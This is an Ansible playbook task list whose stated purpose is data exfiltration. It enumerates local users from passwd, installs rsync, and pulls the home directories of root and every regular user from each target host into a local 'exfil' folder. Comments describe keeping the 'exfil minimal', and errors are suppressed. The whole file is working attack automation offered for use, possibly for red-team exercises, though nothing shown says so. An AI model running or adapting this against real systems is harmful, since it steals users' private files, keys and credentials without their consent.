---
- name: Get all local users from passwd
  ansible.builtin.getent:
    database: passwd

- name: Install Common Packages
  package:
    name: rsync
    state: present

- name: Install Common Packages
  package:
    name: rsync
    state: present
  delegate_to: localhost

- name: Ensure local exfil directory exists
  ansible.builtin.file:
    path: "./exfil/homedirs"
    state: directory
    mode: '0755'
  delegate_to: localhost
  become: no

- name: Pull Home Directory Contents (Root + Humans)
  ansible.posix.synchronize:
    mode: pull
    src: "{{ item.value[4] }}/"
    dest: "./exfil/homedirs/{{ inventory_hostname }}_{{ item.key }}/"
    recursive: yes
    # Excludes large/useless dirs to keep exfil minimal
    rsync_opts:
      - "--exclude=.cache"
      - "--exclude=.local/share"
  loop: "{{ getent_passwd | dict2items }}"
  when: 
    - (item.value[1] | int >= 1000 or item.value[1] | int == 0)
    - item.key != "nobody"
  ignore_errors: yes